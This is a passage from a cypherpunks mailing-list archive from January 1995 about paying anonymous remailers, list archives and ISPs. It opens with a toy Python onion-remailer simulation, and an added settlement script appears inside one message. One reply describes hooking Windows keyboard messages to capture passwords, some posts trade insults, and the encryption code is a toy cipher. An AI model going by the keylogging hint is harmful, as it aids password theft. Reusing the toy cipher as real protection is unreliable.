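    return hashlib.sha256(b"enc" + key).digest(), hashlib.sha256(b"mac" + key).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def seal(key: bytes, layer: dict) -> str:
    """Toy authenticated encryption; a stand-in for PGP to the remailer's key."""
    enc_key, mac_key = _keys(key)
    plain = json.dumps(layer).encode()
    nonce = secrets.token_bytes(16)
    body = bytes(a ^ b for a, b in zip(plain, _keystream(enc_key, nonce, len(plain))))
    tag = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    return (nonce + tag + body).hex()


def unseal(key: bytes, blob: str) -> dict:
    enc_key, mac_key = _keys(key)
    raw = bytes.fromhex(blob)
    nonce, tag, body = raw[:16], raw[16:48], raw[48:]
    expected = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("envelope is not addressed to this remailer")
    plain = bytes(a ^ b for a, b in zip(body, _keystream(enc_key, nonce, len(body))))
    return json.loads(plain)


class Remailer:
    def __init__(self, name: str, pool: dict, for_pay: bool):
        self.name, self.pool, self.for_pay = name, pool, for_pay
        self.key = secrets.token_bytes(32)
        self.seen = []                      # everything this operator could log
        pool[name] = self

    def accept(self, sender: str, blob: str, payment=None):
        # Entry remailers take anyone who pays; inner ones take only the pool.
        if self.for_pay and payment is None:
            return "refused: payment required"
        if not self.for_pay and sender not in self.pool:
            return "refused: consortium members only"
        layer = unseal(self.key, blob)
        self.seen.append({"from": sender, "payment": payment, "next": layer["next"]})
        next_hop = self.pool.get(layer["next"])
        if next_hop is None:                # next address is the real recipient
            return ("delivered", layer["next"], layer["body"])
        return next_hop.accept(self.name, layer["body"])


def wrap(pool: dict, route: list, recipient: str, text: str) -> str:
    """Build the nested envelopes, innermost (last hop) first."""
    blob, next_address = text, recipient
    for name in reversed(route):
        blob = seal(pool[name].key, {"next": next_address, "body": blob})
        next_address = name
    return blob


def build_pool() -> dict:
    pool = {}
    Remailer("entry", pool, for_pay=True)   # charges via the payment system
    Remailer("mid", pool, for_pay=False)    # free, closed to outsiders
    Remailer("exit", pool, for_pay=False)
    return pool


if __name__ == "__main__":
    pool = build_pool()
    blob = wrap(pool, ["entry", "mid", "exit"], "bob@example.org", "hello")
    print(pool["entry"].accept("alice", blob, payment="FV-ACCOUNT-ALICE"))
    for name, remailer in pool.items():
        print(name, remailer.seen)
```

Only the entry remailer's log holds the billing account, and only the exit remailer's log holds the recipient.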




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Fri, 6 Jan 95 14:33:37 PST
To: cypherpunks@toad.com
Subject: Re: public vs. private replies
Message-ID: <199501062238.RAA29242@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501060807.DAA22166@bb.hks.net>,
L. McCarthy <lmccarth@ducie.cs.umass.edu> wrote:
>Tim May writes:
>> In my opinion, having personal access
>> to past posts is several orders of magnitude more important than
>> having MIDI-MIME JPEG-II TeX players [...]
>
>It takes more disk space from one's personal quota, though (for those who
>suffer under such restrictions). :[

All posts to cypherpunks since June '94 are available by ftp from
ftp.hks.net:/cypherpunks/nntp/cypherpunks.   They are also available
via nntp from nntp.hks.net:hks.lists.cypherpunks.

I'd be glad to put a search engine of some sort on them, either by
Web or by mailserver, if someone can suggest a reasonable way to index
the whole lot.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw2LTRNhgovrPB7dAQEDNwP/QTydu0Tp68ytNupes18WU+uv159GJJfE
Wy+3iLxj+9rbPJwEKBZlXqhkfV7pf4nK9wNwiwNR4ZF13zpCAljWPhw3BEgNM4Xj
Ity2GWLb8s7PBMplc+ggTQ4LowMYGqoO/e1pBWH3joFCuv11owkf+ZmbvTSZgU7h
l07wq41l2L0=
=Ao+S
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3GJCoZzwIn1bdtAQFdVAF8DB7xxjzPgHNj2Eil0zEuLKj8SofCLFAs
HBdXBN2fFjT5mNwnKh5a4T1R1Dv0Zp/c
=6bFr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 14:45:36 PST
To: Jonathan Rochkind <jamesd@netcom.com>
Subject: Re: for-pay remailers and FV (Was Re: Remailer Abuse)
In-Reply-To: <4715.789430801.1@nsb.fv.com>
Message-ID: <oj3QO_30Eyt58xICEo@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from fv: 6-Jan-95 Re: for-pay remailers and F.. "James A.
Donald"@netcom (1127*)

> On Fri, 6 Jan 1995, Jonathan Rochkind wrote:

> > Hmm. Maybe I don't completely understand how this is going to work, but
> > won't _every_ remailer in the chain need to know your FV billing account?

> First remailer knows you and your FV billing account.  Charges you
> its own fee and the fee for all for profit remailers in the list.
> (The envelope states what this fee is going to be) 

> Second remailer charges first remailer.

> Third remailer charges second remailer.

> If the postage on the envelope is insufficient to cover all
> the for profit remailers the message passes through, it gets
> bounced or dropped.

> In principle it could work, 

Yes, I think you've probably just identified a *second* way it could
work.  I agree it's awfully complex, though.  I'd prefer my consortium
approach, but it's nice to see that multiple models are possible. --
Nathaniel







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 14:40:13 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501062245.RAA29327@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 5:10 PM 01/06/95, Dr. D.C. Williams wrote:
[suggestion that only the first remailer would get paid, with
justification for that.]
>Operators with the best net. reputations and those whose remailers are
>especially full featured or prompt will likely receive more use as
>"entry" remailers; this is good capitalism which should not only increase
>their number but improve the state of remailers in general. If someone
>wants to establish a remailer that will join the existing mesh of remailers,
>it will have to accept messages from others gratis if it wants such access
>to the rest of them. Its compensation would be derived from initial traffic.

Yeah, that does seem possible.
One thing to keep in mind, though, is that it's really the _last_ remailer
in the chain that's taking the most heat, and it would be nice if they got
paid.  There's also an issue of some remailers refusing to be last in the
chain, so they don't expose themselves so much. So the remailers which
_did_ agree to be last in the chain would obviously get used for this
purpose, while the others wouldn't, but they wouldn't get any more money
for it. They might even get less, since most people probably don't use the
same remailer twice in a chain, so the ones agreeing to be last are hardly
ever going to be first.   That seems undesirable.

Ideally, the forces of capitalism would work on the last remailer on the
chain, rather than (or in addition to) the first, to increase the number of
remailers willing to do this.  All this goes triple for mail-to-news
remailers, since that poses even more exposure to heat, and it would be
nice if ops were compensated for.


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3H8yoZzwIn1bdtAQHFWwGAqDhDUgU4+I4wLsqR8AwHEm09E9lqVjCX
IcKjz280k1pK3MLaOMTCueXVUaZCam6u
=4Wi5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 18:12:40 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID: <Pine.3.89.9501061751.A12229-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:
> 
> drechsau@winternet.com (Mike Horwath) carefully explains all the
> reasons why is it better to have a Netcom account than a
> Winternet account!
> 
>  > I was going to be in, I decided to rest instead.  So sue me
>  > for it.

(Long hilarious list of Mike Horwath's totally unprofessional
behavior deleted.  To save bandwidth, just read it twice, or
better still three times.)

> [Netcom] accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.
> 
> [...]
> 

A big problem with Netcom is that it has no web server,
and its ftp server is totally overwhelmed.

I use nw.com for my web pages and netcom for everything else.

Big bandwidth webservice at reasonable rates

Does anyone have a better suggestion?  I have been shopping
around for a reasonably priced 28KB SLIP connection.  Have
not found one yet.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 6 Jan 95 15:10:09 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: floating point crypto?
Message-ID: <v01510105ab333d693cc6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 1/5/95, Timothy C. May wrote:
>Robert H. has asked that we reply in e-mail to him, to avoid
>"cluttering the list more than I already have...," but the logic of
>this is faulty. The few lines of a response such as this one, or even
>of several such responses, are as nothing compared to dozens or more
>people sifting their own archives so they can each independently send
>Robert what they find. Hence my public reply.

Got that right. No one can be more chagrined than I about this, because
I've seen it happen. I remember Way Back in Ancient History (1985) when
someone who couldn't remember the name of the movie posted the plot to
"Silent Running" to net.sf(?), and asked for e-mail answers, so it
"wouldn't clog the newsgroup". He was begging for mercy as little as 4
hours later... How soon they forget. I'm lucky it didn't happen to me.
Thanks Tim, for saving my bacon.

Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of
stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim
said he got it out of WWW, and maybe he'll post the URL here and that will
be that. Nicely was working with finding multiple primes: Prime twins,
prime triplets, etc.

I will now proceed to post the relevant bits of Jim's and Tim's stuff to
the newsgroup I got "called" in. Thanks to everyone who sent me comments,
pointers, etc.

>Not to sound strident, but if folks would keep copies of articles and
>spend some time organizing them in data bases or in other searchable
>forms, this would help the list. In my opinion, having personal access
>to past posts is several orders of magnitude more important than
>having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R
>Us" in the correct font and with the "R" reversed according to spec.

Indeed.

Having limited space on my poor PowerBook, I have kept mostly the "execrable
e$" types of files, to wit: anything mentioning money, finance, economics,
and whatever crypto is specific to those areas.

Since I started hanging out here this spring, I've accumulated about 10
megs of stuff between this list and www-buyinfo. I just archived everything
from November backwards into Stuffit-compressed Eudora mailboxes. If you
want those, I've got 'em. I did search the files I have after the "great
squeeze", but to no avail. Unfortunately, I did not think I would have to
keep anything to do with Wintel and their potential tribulations. I am,
after all a Certified Macintosh Bigot.

Thanks again, everyone.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 6 Jan 95 15:19:20 PST
To: cypherpunks@toad.com
Subject: Re: sniff passwords on PC (DOS)
Message-ID: <9501062310.AB20311@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 AM 1/6/95 CST, m00012@KANGA.STCLOUD.MSUS.EDU wrote:
> ... It does not work after starting windows.  Not sure, but it seems obvious
>that MS windows installs its own keyboard interrupt. ...

True, but it's fairly simple to write a program that loads itself in 
win.ini and also hooks the keyboard messages from Windows.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 18:12:43 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501061945.A12905-0100000@mindvox>
Message-ID: <199501070212.SAA19162@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"I'm Wozz" <wozzeck@phantom.com> writes:

[miscellaneous Netcom-honking elided]

 > It just so happens the AUP of winternet allows for this
 > situation.

Right.  And a small service provider can make any "terms of
service agreement" his or her little heart desires.  Just like
the owner of a two line BBS.  With big service providers, such
things tend to be done in a somewhat more business-like fashion.

 > its a bit far fetched to call HIS reaction a tantrum.... If
 > anyone's screaming for mommy its whats-her-name....

Well, if I posted a message to 10 newsgroups and some bozo posted
a message to a.c-e.n-a falsely implying that it was the beginning
of some sort of massive spam, I would certainly not be pleased.
If Netcom, after receiving some small amount of flamage on the
subject, summarily removed access to my account and made
themselves unavailable for several days when I tried to contact
them to discuss the matter, and then tossed me off with a
flippant "so sue me" when I protested, I would be even less
pleased.  Fortunately, I can't imagine Netcom even caring about a
10 newsgroup cross-post.

 > big is better i guess....

In the case of Internet Service Providers, big is definitely
better.  There are simply economies of scale which are not
realized with smaller operations.  Netcom has had some problems,
but almost all of them were growth related.  None of them were
intrinsic to the systems and network itself.

 > Winternet is HARDLY a 'bbs'.  Its a regional internet
 > service....much as netcom was before they flooded every
 > city with dialups.

Read again, this time for comprehension.  I did not say Winternet
was a BBS.  Merely that smaller ISPs have many of the undesirable
characteristics found in BBS systems.

 > Any professional knows better than to read private
 > mail...and if this is so...then they aren't worthy of having
 > a site to run

For legal purposes, most BBS systems declare that for the
purposes of the ECPA, there is no such thing as private mail on
their system.  The Sysop is then free to read anything he wishes
to.  This policy is clearly stated in the user agreements of
almost all BBS systems offering access to the public.

 > as for PGP, this is an individual thing....I'm sure mike
 > has no such objections...i know here at MindVox we
 > don't...in fact, we installed it for the users

Many BBS Sysops forbid PGP and kick users off their systems who
use it.  They cite fears of encrypted illegal porn and credit
card numbers passing through their systems, and potential legal
liability.

 > Netcom is an abomination.....it is the only one of its kind
 > (not counting delphi etc, since they were conceived under
 > different systems)

Netcom is the fastest growing and leading Internet Service
Provider.  Their ability to attract new customers is limited only
by the rate at which they are able to increase capacity.  Their
respect for freedom of expression is absolute and they do not
meddle in their customers' affairs.  Their prices are reasonable
and their user agreement is fair.  Works for me. :)

 > They suck network services off others (irc as one example)
 > and don't take responsibility for the HUGE number of idiots
 > on their service who maliciously hack anything they can
 > reach....its totally without personality...AND....its slower
 > than molasses...the management is out of touch with the
 > users and they are so overloaded with trouble reports, they
 > don't know what to do with them.

Perhaps an exaggerated description of Netcom a few months ago,
but certainly not the current state of affairs.  I always get a
line when I dial in, response time is reasonable, disk is
abundant, and almost all software is available.  Speed of network
connections to other sites is quite acceptable.

 > This has got to be one of the largest loads of crap I've
 > seen tossed on this list in the year and a half i've lurked
 > on it.

Everyone is certainly entitled to an opinion, which, in the words
of Robert Blake, is one of the two things all humans have. :)

 > oh...btw...i don't have ANY connection to winternet, other
 > than knowing MANY satisfied customers, and having heard
 > a lot about them, as a sysadmin for a site in much the same
 > situation.

The number of satisfied customers is not the measure of a site,
any more than the number of people still alive is the measure of
a disease.

Netcom works with the reliability of the phone company.  It is
always there, almost always up, and is redundant enough that when
something breaks, it is still usable.  I pay my $19.50 a month
and I get unlimited everything.  I'm happy.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Tengi" <tengi@Princeton.EDU>
Date: Fri, 6 Jan 95 15:23:33 PST
To: cactus@seabsd.hks.net (L. Todd Masco)
Subject: Indexing and searching (was Re: public vs. private replies)
In-Reply-To: <199501062238.RAA29242@bb.hks.net>
Message-ID: <9501062315.AA29835@deepthought.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


You may want to take a look at glimpse and harvest.  Here are some useful URLs 
for them:

http://glimpse.cs.arizona.edu:1994/

http://harvest.cs.colorado.edu/

> In article <199501060807.DAA22166@bb.hks.net>,
> L. McCarthy <lmccarth@ducie.cs.umass.edu> wrote:
> >Tim May writes:
> >> In my opinion, having personal access
> >> to past posts is several orders of magnitude more important than
> >> having MIDI-MIME JPEG-II TeX players [...]
> >
> >It takes more disk space from one's personal quota, though (for those who
> >suffer under such restrictions). :[
> 
> All posts to cypherpunks since June '94 are available by ftp from
> ftp.hks.net:/cypherpunks/nntp/cypherpunks.   They are also available
> via nntp from nntp.hks.net:hks.lists.cypherpunks.
> 
> I'd be glad to put a search engine of some sort on them, either by
> Web or by mailserver, if someone can suggest a reasonable way to index
> the whole lot.
> --
> Todd Masco     | "life without caution/ the only worth living / love for a man/
> cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
> Cactus' Homepage





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 6 Jan 95 15:19:15 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501062324.SAA29816@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Jonathan replied:

> One thing to keep in mind, though, is that it's really the _last_ remailer
> in the chain that's taking the most heat, and it would be nice if they got
> paid.

Unfortunately, this creates the closest association between specific
traffic and paying customers.

>  There's also an issue of some remailers refusing to be last in the
> chain, so they don't expose themselves so much. So the remailers which
> _did_ agree to be last in the chain would obviously get used for this
> purpose, while the others wouldn't, but they wouldn't get any more money
> for it.

What's to prevent mail from remailer A sent to remailer B from being
sent right back to A for delivery? That's a part of the mixing required
for true randomness. I don't know if this is being done now (by Chain or
premail), and I'd like to know why. There might well be a good reason I'm
not aware of. In order to join the mesh, remailers would be required
to accept and ultimately deliver mail to ensure equality among them.

I believe that a class of "prime" remailers would arise; these would be
the preferred remailers, and their input and output would largely be
balanced. This assumes, of course, that "second-class" remailers (those
which profit equally but don't deliver as the last unit in the chain)
aren't allowed in on an equal basis. Prime operators deserve, and would
receive, compensation.

> They might even get less, since most people probably don't use the
> same remailer twice in a chain, so the ones agreeing to be last are hardly
> ever going to be first.   That seems undesirable.

See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ?
If someone is logging messages and routing, it's less secure, but then so is
the entire remailer system. Prime remailer operators are those who don't
log.

Maybe message size would tip off snoopers. This can be overcome with minor
tweaking to existing remailer code by tacking on or eliminating padding
to messages. But logging still makes the whole system extremely vulnerable.

> remailers, since that poses even more exposure to heat, and it would be
> nice if ops were compensated for.

Agreed. But since the payment "on the way out" (i.e.; a store) is much
less desirable (and would probably work to reduce traffic), payment "on the 
way in" (i.e.; the subway) seems like the preferred alternative.

=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3RLCoZzwIn1bdtAQHpYgF/brIk7ssBTsR+26TqW6MifGwz+lymbXlc
cYWFzNCJcrbRTgy7zHgPisvk/roHW0Nv
=XJAq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 18:26:04 PST
To: "I'm Wozz" <wozzeck@phantom.com>
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501061945.A12905-0100000@mindvox>
Message-ID: <Pine.3.89.9501061827.A22477-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, I'm Wozz wrote:
> > 
> > Big providers like Netcom have many employees and many machines.
> > Things do not screech to a halt when "the guy who owns the
> > machine" takes a mental health day. :)
> > 
> 
> no instead things screech to a halt when the 1000th user gets on each 
> client machine

When Netcom slows down, this is not because the asshole in charge
is being an asshole.

He may well be an asshole, but the size of netcom protects
me from having to discover this.

This is good for my mental health.  

> 
> I'd love to see a response to this...please!

You are totally full of shit.

Mike Horwath was arrogant and unprofessional.  

The problems you describe with Netcom's service are entirely
accurate.  I am looking for a better solution.  Submitting to 
the authority of an arrogant and incompetent fool does not
seem like a good solution.

He is plainly a fool, because if I had acted as he has acted,
I would certainly not post this all over the place.

Until he posted, I had assumed that Carol was having a hissy fit,
that she was premenstrual or something.

Now I see why she is upset. 

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 6 Jan 95 15:37:15 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <9501062326.AA20655@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:44 PM 1/6/95 -0500, Jonathan Rochkind wrote:
> ... Why?  Why wouldn't the FV remailers use settlements?  At the end of
>>the month, everyone settles accounts in re who gets what fraction of
>>what.  No logs are needed other than counters.
>
> ... 1) The initial remailer has no way of knowing how many subsequent links
>there are in the chain, and so doesn't know if I've paid him enough to
>reimburse everyone else.  I can easily cheat. He also doesn't know _who_
>the subsequent chains are. He can deduct one "stamp" from the amount, and
>forward the rest on to the next remailer, and trust them to do the same,
>but if I'm cheating there won't be enough to make it to the end of the
>chain.  Both of these facts (initial op doesn't know how long the chain
>will be, or who will be on it) are essential to the security I get from
>using anon remailers, so even if they could be "fixed", it would be bad to.

No, basically the idea is that each stamp covers an average number of 
remailer hops.  The remailer ops get together, with counts of their ins and 
outs to each other, and split some fraction of the stamp prices accordingly. 
 They can even determine the average number of hops given the in/out counts. 
 Fairly simple, actually.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com
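
The settlement by counters described in this message, worked through as an added example (not part of the original post or of any remailer's code). The stamp price, the counter names and the monthly figures are constructed, and splitting the whole stamp pool in proportion to messages handled is one assumed reading of "split ... accordingly".

```python
from fractions import Fraction

STAMP_CENTS = 30   # assumed stamp price in cents; the thread names no figure

# Constructed monthly totals. Each operator keeps four counters and no
# per-message log:
#   stamps     messages accepted from paying customers (one stamp each)
#   peer_in    messages accepted from other consortium remailers
#   peer_out   messages forwarded to other consortium remailers
#   delivered  messages sent on to their final recipient
COUNTERS = {
    "A": {"stamps": 600, "peer_in": 500, "peer_out": 900, "delivered": 200},
    "B": {"stamps": 300, "peer_in": 800, "peer_out": 700, "delivered": 400},
    "C": {"stamps": 100, "peer_in": 700, "peer_out": 400, "delivered": 400},
}


def handled(c: dict) -> int:
    """Messages this remailer processed, whoever handed them over."""
    return c["stamps"] + c["peer_in"]


def check_counters(counters: dict) -> None:
    """Reject reports that cannot all be true at once.

    Assumes every accepted message was either forwarded or delivered
    within the month (nothing dropped, nothing still queued).
    """
    for name, c in counters.items():
        if handled(c) != c["peer_out"] + c["delivered"]:
            raise ValueError(f"{name}: accepted and sent totals differ")
    total_in = sum(c["peer_in"] for c in counters.values())
    total_out = sum(c["peer_out"] for c in counters.values())
    if total_in != total_out:
        raise ValueError("peer-to-peer totals differ across the consortium")


def average_hops(counters: dict) -> Fraction:
    """Average chain length: total handlings divided by stamps sold."""
    check_counters(counters)
    stamps = sum(c["stamps"] for c in counters.values())
    return Fraction(sum(handled(c) for c in counters.values()), stamps)


def settle(counters: dict, stamp_cents: int = STAMP_CENTS) -> dict:
    """Net cents each operator receives (+) or pays into the pool (-)."""
    check_counters(counters)
    pool = stamp_cents * sum(c["stamps"] for c in counters.values())
    total = sum(handled(c) for c in counters.values())
    return {
        name: Fraction(pool * handled(c), total) - stamp_cents * c["stamps"]
        for name, c in counters.items()
    }


if __name__ == "__main__":
    print("average hops:", average_hops(COUNTERS))
    for name, cents in settle(COUNTERS).items():
        print(name, "net cents:", cents)
```
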





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 18:31:50 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <wj3QKlz0Eyt5AxIAJg@nsb.fv.com>
Message-ID: <199501070231.SAA20999@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


This whole fracas between blind-sig money and FV money is a symptom of
the confusion between clearing and settlement.

Roughly speaking, clearing is when authorization moves (i.e. a
liability is created), and settlement is when money moves (i.e. when
that liability is discharged).  Clearing should always happen at or
before settlement.  In order to do on-line digital postage, you need
clearing to happen at the point of remailing.  Settlement can happen
at some later time.

Settlement need not be in real money.  The liability of other
settlement facilities can be used.  This is in fact how central
banking works.  Only the central bank moves "actual" funds; everyone
else moves liabilities around.

To wit, a remailer consortium would do best to issue a local banknote
usable only by themselves and have customers settle with the
consortium issuer, rather than any member of the consortium itself.
If the consortium issuer were to use blind sigs, the consortium
members wouldn't be able to ascertain who paid.

The mechanism for settlement could be credit cards directly, mailed in
checks, even FV.  The preferences of the consortium members for issues
of timeliness of settlement, reversibility, loss sharing, etc. would
decide the actual choice of settlement mechanism.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 18:44:27 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: for-pay remailers and FV
In-Reply-To: <199501070231.SAA20999@largo.remailer.net>
Message-ID: <Pine.3.89.9501061816.A25172-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Eric Hughes wrote:
> This whole fracas between blind-sig money and FV money is a symptom of
> the confusion between clearing and settlement.

It is nothing to do with that confusion.

> To wit, a remailer consortium would do best to issue a local banknote
> usable only by themselves and have customers settle with the
> consortium issuer, rather than any member of the consortium itself.
> If the consortium issuer were to use blind sigs, the consortium
> members wouldn't be able to ascertain who paid.

If they could use blind sigs they would not need a consortium.

The customer would just put the postage inside the envelope, and
each for-pay remailer would just peel off an envelope layer,
and use the postage that the user provided for it.

Chaumian money solves the problems we are discussing.

The problem that we are discussing is how to solve them 
without using Chaumian money.


 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 6 Jan 95 19:12:01 PST
To: tcmay@netcom.com
Subject: A Fire Upon the Deep
Message-ID: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199501052231.OAA11745@netcom5.netcom.com>, tcmay@netcom.com 
(Timothy C. May) says:
>Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some
>casual mentions of crypto, including the odd speculation that those in
>the know in the distant future don't really trust public key crypto.
 
This is quite sensible given that in the Zone universe, you may have no
idea how much computing power your enemies have, so no cryptography
that is only computationally secure can really be trusted.
 
_A Fire Upon the Deep_ also describes how anarchy might work on a
galactic scale.  For example, Vinge seems to think that arbitration
organizations would be very important in such an anarchy and would
acquire military characteristics.  Issues of trust and reputation
are also treated implicitly.
 
There was some recent talk about network agent technology on this list.
Vinge mentions almost in passing how an entire planet (or maybe planets)
was taken over by an "intelligent net packet".  Makes me rather nervous
about things like Magic Cap...
 
One more thing that's marginally related to cypherpunks (hey I really
like this book so I'll take any chance I can to talk about it ;-) is
the idea that the efficiency of distributed computation (and distributed 
intelligence) depends on high bandwidth and low latency of the communication
medium.  Since anonymity seems to have rather high costs in terms of
bandwidth and latency (compare anonymous e-mail with internet video
conferencing or even with normal e-mail), this implies that
an organization of anonymous agents will not work as efficiently as
a similar organization whose members are not concerned about
anonymity.
 
Wei Dai
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Fri, 6 Jan 95 16:47:38 PST
To: cypherpunks@toad.com
Subject: Peter D. Lewis
Message-ID: <199501070053.TAA00768@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Culled from a columbia newsgroup:

>WIRED magazine now has a "Peter Lewis Prize for Bad Internet
>Reporting".  Check out: http://www.hotwired.com/Signal/Flux/ where
>they announce the prize each week.  Also read the story how Reuters
>muffed up the Microsoft/Catholic Church reporting.

You know it's bad when WIRED accuses you of bad reporting.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3l5yoZzwIn1bdtAQHYmwGAmV97gzR8Tcl4b5iWMtRSbxUGKGFjEErS
CNbc4fIyVrRnpUg55T8PSB9RktUn/I5K
=OK63
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 17:08:34 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
